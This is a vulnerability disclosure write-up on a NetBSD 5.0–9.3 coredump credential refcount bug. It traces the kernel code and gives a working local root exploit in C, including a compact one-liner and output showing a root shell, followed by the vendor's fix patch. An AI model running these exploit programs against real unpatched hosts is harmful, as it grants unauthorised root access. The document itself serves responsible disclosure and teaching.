Crash Override: NetBSD 5.0-9.3 Coredump Kernel Refcount LPE
chrisIntroduction
NetBSD 5.0 (released 2009) introduced a change to the in-kernel coredump handler that accidentally introduced a reference count bug on the crashing process’ credential.
Triggering the vulnerability leads to a use-after-free that can be trivially (though slowly) exploited to achieve local privilege escalation, gaining root from an unprivileged starting point.

This article will discuss the simplicity of both the vulnerability and exploitation strategy, leading onto a functional proof of concept exploit.
The vulnerability affects all versions of NetBSD from 5.0 through to 9.3 and can be exploited in an architecture-independent manner. A fix was pushed to branches for NetBSD 8.x and NetBSD 9.x followed by advisory release soon afterwards.
Special thanks to Christos Zoulas of NetBSD for keeping me personally updated, authoring and pushing through the relevant advisory.
Vulnerability Overview
Coredumps are created for processes when they appear to have
unexpectedly terminated. The idea is to capture as much debug
information as possible to assist somebody in diagnosing what actually
happened and why. These coredumps are usually written to disk in the
current working directory of the process with a .core
file
extension.
We can see the jumping off point for invoking any registered coredump handler in the guts of the signal handling code:
/*
* Force the current process to exit with the specified signal, dumping core
* if appropriate. We bypass the normal tests for masked and caught
* signals, allowing unrecoverable failures to terminate the process without
* changing signal state. Mark the accounting record with the signal
* termination. If dumping core, save the signal number for the debugger.
* Calls exit and does not return.
*/
void
sigexit(struct lwp *l, int signo)
{
int exitsig, error, docore;
...
[1] if ((docore = (sigprop[signo] & SA_CORE)) != 0) {
...
if (docore) {
mutex_exit(p->p_lock);
[2] MODULE_HOOK_CALL(coredump_hook, (l, NULL), enosys(), error);
If a signal is configured to force an exit of the process then we end
up in this sigexit
function. Further, if the specific
signal has been configured to trigger a coredump [1] then we reach a
call to whatever coredump_hook
has been configured [2].
There is only one coredump handler registered in the NetBSD codebase:
MODULE_HOOK_SET(coredump_hook, coredump);
The coredump
function describes itself well and is
pretty simple:
/*
* Dump core, into a file named "progname.core" or "core" (depending on the
* value of shortcorename), unless the process was setuid/setgid.
*/
static int
coredump(struct lwp *l, const char *pattern)
{
struct vnode *vp;
struct proc *p;
struct vmspace *vm;
kauth_cred_t cred;
struct pathbuf *pb;
struct vattr vattr;
struct coredump_iostate io;
struct plimit *lim;
int error, error1;
char *name, *lastslash;
...
/*
* It may well not be curproc, so grab a reference to its current
* credentials.
*/
[3] kauth_cred_hold(p->p_cred);
cred = p->p_cred;
...
[4] pb = pathbuf_create(name);
if (pb == NULL) {
error = ENOMEM;
goto done;
}
[5] error = vn_open(NULL, pb, 0, O_CREAT | O_NOFOLLOW | FWRITE,
S_IRUSR | S_IWUSR, &vp, NULL, NULL);
if (error != 0) {
pathbuf_destroy(pb);
[6] goto done;
}
...
[7] done:
if (name != NULL)
PNBUF_PUT(name);
return error;
}
One of the first things the function does is hold onto the crashing process’ credential [3]. This takes a reference on it so that it can’t go away while it’s being dealt with.
Omitted from the snippet here is the logic for building up the
corefile name. Once it has been built, the function goes on to create a
pathbuf
from it [4] and then tries to open that path for
writing through vn_open
at [5].
If that vn_open
fails for any reason – for instance, if
the crashing process doesn’t have permission to create files in the
current directory – then the code jumps to done
[6].
At done
, we expect to see the cleanup code for the
failed coredump attempt [7]. The name
pathname buffer is
indeed put, but nothing else happens here.
Importantly, the reference taken on the credential at [3] is never released. In fact, none of the error or success paths seem to do this.
This is the vulnerability: it’s a classic refcount bug that we can trigger by crashing one of our processes.
Exploitability Analysis
To understand whether this refcount bug is exploitable, we need to
ensure that a wrap of the refcount won’t be detected or prevented. We
can find that out by looking at the kauth_cred_hold
function:
/* Increment reference count to cred. */
void
kauth_cred_hold(kauth_cred_t cred)
{
KASSERT(cred != NULL);
KASSERT(cred != NOCRED);
KASSERT(cred != FSCRED);
KASSERT(cred->cr_refcnt > 0);
[1] atomic_inc_uint(&cred->cr_refcnt);
}
We see here that atomic_inc_uint
is used to increment
the reference count [1]. That will not detect the wrap. The
KASSERT
s in this function are also essentially nops for
anything other than debug kernels, so we can ignore them.
Also worth noting is that cr_refcnt
is a
u_int
. That’s 32 bits wide on the platforms we probably
care about, which means that wrapping the count is feasible.
Assuming we can wrap the reference count and trigger a path that
decrements it afterwards, what happens? We can answer that by looking at
the responsible function, kauth_cred_free
:
/* Decrease reference count to cred. If reached zero, free it. */
void
kauth_cred_free(kauth_cred_t cred)
{
KASSERT(cred != NULL);
KASSERT(cred != NOCRED);
KASSERT(cred != FSCRED);
KASSERT(cred->cr_refcnt > 0);
ASSERT_SLEEPABLE();
#ifndef __HAVE_ATOMIC_AS_MEMBAR
membar_release();
#endif
[2] if (atomic_dec_uint_nv(&cred->cr_refcnt) > 0)
return;
#ifndef __HAVE_ATOMIC_AS_MEMBAR
membar_acquire();
#endif
kauth_cred_hook(cred, KAUTH_CRED_FREE, NULL, NULL);
specificdata_fini(kauth_domain, &cred->cr_sd);
[3] pool_cache_put(kauth_cred_cache, cred);
}
This function decrements the refcount and, if it’s still positive [2], just returns out.
If the refcount did drop to zero then a little tidying up is done
before putting the credential back into the
kauth_cred_cache
[3].
This is an interesting point to note: kauth_cred_t
s are
allocated from their own dedicated pool and not the general purpose
heap. This fact informs our exploit development process.
I admit to knowing next to nothing about the NetBSD kernel heaps. Even so, without knowing any of the internals, we can make an educated guess that it probably works in a last-in, first-out (LIFO) fashion as most kernel heap implementations tend to.
Exploitation Strategy
We need to think about how we might exploit this:
- Trigger the vulnerability to wrap the
kauth_cred_t
refcount to 1. - Cause
kauth_cred_free
to get called somehow. - Have a privileged
kauth_cred_t
allocated in its place.
If we assume the kernel heap operates on a LIFO basis, this should be
enough to elevate our privileges. So what could be a convenient way of
calling kauth_cred_free
on our credential?
One very simple observation is that kauth_cred_free
is
called when a process is reaped. This leads to a nice simple strategy of
looping doing:
- Fork.
- In the child, trigger a coredump (e.g. through
abort(3)
). - In the parent, reap the child through
wait(2)
.
Eventually that reap at step 3 will drop the
kauth_cred_t
reference from its wrapped value of 1 down to
0 and cause it to be freed, leaving the parent process with a dangling
credential on its process (p->p_cred
).
With a dangling kauth_cred_t
pointer, our next job is to
allocate a privileged credential in its place. How could we do that?
Amusingly, it turns out that we can just call setuid(0);
and magically become root. :)
Let’s start out by looking at sys_setuid
:
/* ARGSUSED */
int
sys_setuid(struct lwp *l, const struct sys_setuid_args *uap, register_t *retval)
{
/* {
syscallarg(uid_t) uid;
} */
uid_t uid = SCARG(uap, uid);
[1] return do_setresuid(l, uid, uid, uid,
ID_R_EQ_R | ID_E_EQ_R | ID_S_EQ_R);
}
Most of the core logic of the various setuid
functions
is actually implemented by the do_setresuid
function
[1].
/*
* Set real, effective and saved uids to the requested values.
* non-root callers can only ever change uids to values that match
* one of the processes current uid values.
* This is further restricted by the flags argument.
*/
int
do_setresuid(struct lwp *l, uid_t r, uid_t e, uid_t sv, u_int flags)
{
struct proc *p = l->l_proc;
kauth_cred_t cred, ncred;
[2] ncred = kauth_cred_alloc();
/* Get a write lock on the process credential. */
proc_crmod_enter();
[3] cred = p->p_cred;
/*
* Check that the new value is one of the allowed existing values,
* or that we have root privilege.
*/
if ((r != -1
&& !((flags & ID_R_EQ_R) && r == kauth_cred_getuid(cred))
&& !((flags & ID_R_EQ_E) && r == kauth_cred_geteuid(cred))
&& !((flags & ID_R_EQ_S) && r == kauth_cred_getsvuid(cred))) ||
(e != -1
&& !((flags & ID_E_EQ_R) && e == kauth_cred_getuid(cred))
&& !((flags & ID_E_EQ_E) && e == kauth_cred_geteuid(cred))
&& !((flags & ID_E_EQ_S) && e == kauth_cred_getsvuid(cred))) ||
(sv != -1
&& !((flags & ID_S_EQ_R) && sv == kauth_cred_getuid(cred))
&& !((flags & ID_S_EQ_E) && sv == kauth_cred_geteuid(cred))
&& !((flags & ID_S_EQ_S) && sv == kauth_cred_getsvuid(cred)))) {
int error;
error = kauth_authorize_process(cred, KAUTH_PROCESS_SETID,
p, NULL, NULL, NULL);
if (error != 0) {
proc_crmod_leave(cred, ncred, false);
return error;
}
}
/* If nothing has changed, short circuit the request */
[4] if ((r == -1 || r == kauth_cred_getuid(cred))
&& (e == -1 || e == kauth_cred_geteuid(cred))
&& (sv == -1 || sv == kauth_cred_getsvuid(cred))) {
[5] proc_crmod_leave(cred, ncred, false);
return 0;
}
...
The very first thing that happens in this function is a new
credential, ncred
, is allocated [2]. We also pull out the
pointer to the current credential, cred
[3].
Given that the kernel heap is LIFO and p->p_cred
is
dangling, we actually end up in the situation where
ncred == cred
. So p->p_cred
is now pointing
to whatever kauth_cred_alloc
returned:
/* Allocate new, empty kauth credentials. */
kauth_cred_t
kauth_cred_alloc(void)
{
kauth_cred_t cred;
cred = pool_cache_get(kauth_cred_cache, PR_WAITOK);
cred->cr_refcnt = 1;
cred->cr_uid = 0;
cred->cr_euid = 0;
cred->cr_svuid = 0;
cred->cr_gid = 0;
cred->cr_egid = 0;
cred->cr_svgid = 0;
cred->cr_ngroups = 0;
specificdata_init(kauth_domain, &cred->cr_sd);
kauth_cred_hook(cred, KAUTH_CRED_INIT, NULL, NULL);
return (cred);
}
Aha, that just happens to be a nice pure root cred. :)
With both ncred
and cred
pointing to a pure
root cred, we skip over the first big if-statement in
do_setresuid
and land at [4]. The conditions at [4] now
check out and we call proc_crmod_leave
before returning
success to userland.
We are now magically root.
An important side note here is that our p->p_cred
is
actually still dangling: that’s because the call to
proc_crmod_leave
drops a reference on one of the cred
arguments. Since the cred has a refcount of 1 at this point, a free will
occur.
But that’s okay as long as we’re careful: figuring out how to secure our access and leave the system in a stable state from this point is academic. For our proof of concept, just doing this will be fine.
The final process is:
- Loop while
setuid(0)
fails:- Fork.
- In the child, call
abort(3)
to trigger a coredump. - In the parent, call
wait(2)
to reap the child.
- If we’ve exited the loop, we’re now root, so drop to a shell.
Visualisation
Some ASCII art can help visualise this process. After many coredumps,
we end up with our kauth_cred_t
’s cr_refcnt
being zero:
┌────────────────────┐
│ │
│ │
│ parent proc │─p_cred─┐
│ │ │
│ │ │ ┌──────────────────────────┐
└────────────────────┘ │ │ │
│ │ │ kauth_cred_t │
│ │ │ uid: 1000 │
│ ├────────▶│ cr_refcnt: 0 │
▼ │ │ │
┌────────────────────┐ │ │ │
│ │ │ └──────────────────────────┘
│ │ p_cred │
│ child proc │────────┘
│ │
│ │
└────────────────────┘
Now when this child triggers a coredump, we end up with yet another reference taken:
┌────────────────────┐
│ │
│ │
│ parent proc │─p_cred─┐
│ │ │
│ │ │ ┌──────────────────────────┐
└────────────────────┘ │ │ │
│ │ │ kauth_cred_t │
│ │ │ uid: 1000 │
│ ├────────▶│ cr_refcnt: 1 │
▼ │ │ │
┌────────────────────┐ │ │ │
│ │ │ └──────────────────────────┘
│ child proc │ p_cred │
│ <in coredump> │────────┘
│ │
│ │
└────────────────────┘
Since coredump
bumps the refcount to 1 and leaves it
there, when the parent process now comes to reap the child,
kauth_cred_free
will see cr_refcnt
drop to
zero and free the cred:
┌ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─
┌────────────────────┐ │
│ │ │ <free memory>
│ │ kauth_cred_t │
│ parent proc │────p_cred────▶│ uid: 1000
│ │ cr_refcnt: 0 │
│ │ │
└────────────────────┘ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┘
Now our process’ p_cred
points to something that still
looks like a cred, but it’s actually been freed.
Calling setuid(0);
now will allocate that same virtual
address, overwrite it, find that we already appear to be root and return
success (freeing the cred back again). That leaves us in this state:
┌ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─
┌────────────────────┐ │
│ │ │ <free memory>
│ │ kauth_cred_t │
│ parent proc │────p_cred────▶│ uid: 0
│ │ cr_refcnt: 0 │
│ │ │
└────────────────────┘ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┘
Our p_cred
is still pointing to freed memory, but now it
looks like a root cred because of how do_setresuid
works.
We’re effectively root, even if we are standing on thin ice at this
point.
Proof of Concept Exploit
Here’s the code with utility code omitted:
/*
* Crash Override: NetBSD 5.0-9.3 Coredump LPE PoC
* By [email protected] / 2022-Sep-06
*/
#include <machine/limits.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>
#include "libpoc.h"
const char *poc_title = "NetBSD 5.0-9.3 Coredump Local Privilege Escalation (Crash Override)";
const char *poc_author = "[email protected]";
int
main(int argc, char *argv[])
{
unsigned int n;
char * const av[] = { "/bin/sh", "-i", NULL };
char * const ev[] = { "PATH=/bin:/sbin:/usr/bin:/usr/sbin", NULL };
banner();
log_info("Changing directory to /");
expect(chdir("/"));
log_info("Beginning refcount wrap");
for (n = 0; n < UINT_MAX; ++n) {
if (!(n & 0x000fffff)) {
log_progress("Progress: 0x%08x / ~0x%08x...", n, UINT_MAX);
}
if (!vfork()) {
abort();
} else {
expect(wait(NULL));
}
if (!setuid(0)) {
break;
}
}
log_progress_complete();
if (getuid() == 0) {
log_info("Success!");
expect(execve(av[0], av, ev));
}
log_fatal("Failed");
return 0;
}
A full PoC archive is provided at the end of the article.
We can also make this a terrible one-liner for which I can only apologise:
/* cc -o d d.c && ./d */
main(){while((vfork()||*(int*)0)&&(!wait(0)||setuid(0)));execl("/bin/sh","-i",0);}
Triggering this particular refcount bug takes some time since we’re
continuously creating and destroying processes as we go. This was
compounded by the fact that my experiments were being done on an
emulated amd64 QEMU VM; all of my machines are Apple Silicon these days.
vfork
helps substantially over fork
, but it’s
still a multi-hour marathon to complete the wrap.
To simplify exploit development, I decided to cheat. I modified the
kernel coredump
function locally to wrap after
p->p_cred->cr_refcnt
exceeded 200, then recompiled
overnight. This gave me confidence that the bug was real without being
too expensive time-wise.
Once the technique was proven, I repeated against unmodified, clean installs for both NetBSD 9.3 and NetBSD 8.0 as those represented the span of currently-maintained releases at time of writing. The exploit succeeded just fine for both.
Here’s some sample output of the PoC running:
$ uname -msr
NetBSD 9.3 amd64
$ make all && ./crash-override
cc -c -o crash-override.o crash-override.c
cc -c -o libpoc.o libpoc.c
cc -o crash-override crash-override.o libpoc.o
[+] NetBSD 5.0-9.3 Coredump Local Privilege Escalation (Crash Override)
[+] By [email protected]
[+] ---
[+] Changing directory to /
[+] Beginning refcount wrap
[+] Progress: 0xfff00000 / ~0xffffffff...
[+] Success!
# id
uid=0(root) gid=0(wheel)
# whoami
root
#
Fix
I reported the issue to the NetBSD Security Alert Team on the 6th of September, 2022. The issue was quickly fixed with the following patch:
diff --git a/sys/kern/kern_core.c b/sys/kern/kern_core.c
index c42bcfb229ea..22f47c894ae8 100644
--- a/sys/kern/kern_core.c
+++ b/sys/kern/kern_core.c
@@ -1,4 +1,4 @@
-/* $NetBSD: kern_core.c,v 1.35 2021/06/29 22:40:53 dholland Exp $ */
+/* $NetBSD: kern_core.c,v 1.36 2022/09/09 14:30:17 christos Exp $ */
/*
* Copyright (c) 1982, 1986, 1989, 1991, 1993
@@ -37,7 +37,7 @@
*/
#include <sys/cdefs.h>
-__KERNEL_RCSID(0, "$NetBSD: kern_core.c,v 1.35 2021/06/29 22:40:53 dholland Exp $");
+__KERNEL_RCSID(0, "$NetBSD: kern_core.c,v 1.36 2022/09/09 14:30:17 christos Exp $");
#ifdef _KERNEL_OPT
#include "opt_execfmt.h"
@@ -121,7 +121,7 @@ coredump(struct lwp *l, const char *pattern)
struct vnode *vp;
struct proc *p;
struct vmspace *vm;
- kauth_cred_t cred;
+ kauth_cred_t cred = NULL;
struct pathbuf *pb;
struct vattr vattr;
struct coredump_iostate io;
@@ -145,9 +145,7 @@ coredump(struct lwp *l, const char *pattern)
if (USPACE + ctob(vm->vm_dsize + vm->vm_ssize) >=
p->p_rlimit[RLIMIT_CORE].rlim_cur) {
error = EFBIG; /* better error code? */
- mutex_exit(p->p_lock);
- mutex_exit(&proc_lock);
- goto done;
+ goto release;
}
/*
@@ -164,9 +162,7 @@ coredump(struct lwp *l, const char *pattern)
if (p->p_flag & PK_SUGID) {
if (!security_setidcore_dump) {
error = EPERM;
- mutex_exit(p->p_lock);
- mutex_exit(&proc_lock);
- goto done;
+ goto release;
}
pattern = security_setidcore_path;
}
@@ -180,11 +176,8 @@ coredump(struct lwp *l, const char *pattern)
error = coredump_buildname(p, name, pattern, MAXPATHLEN);
mutex_exit(&lim->pl_lock);
- if (error) {
- mutex_exit(p->p_lock);
- mutex_exit(&proc_lock);
- goto done;
- }
+ if (error)
+ goto release;
/*
* On a simple filename, see if the filesystem allow us to write
@@ -198,6 +191,7 @@ coredump(struct lwp *l, const char *pattern)
error = EPERM;
}
+release:
mutex_exit(p->p_lock);
mutex_exit(&proc_lock);
if (error)
@@ -284,6 +278,8 @@ coredump(struct lwp *l, const char *pattern)
if (error == 0)
error = error1;
done:
+ if (cred != NULL)
+ kauth_cred_free(cred);
if (name != NULL)
PNBUF_PUT(name);
return error;
We can see that the fix correctly adds the missing
kauth_cred_free
call to the exit path.
The patch was made for NetBSD 8.x and 9.x; releases prior to NetBSD 8.0 are not maintained per the NetBSD maintenance policy and so won’t receive the fix.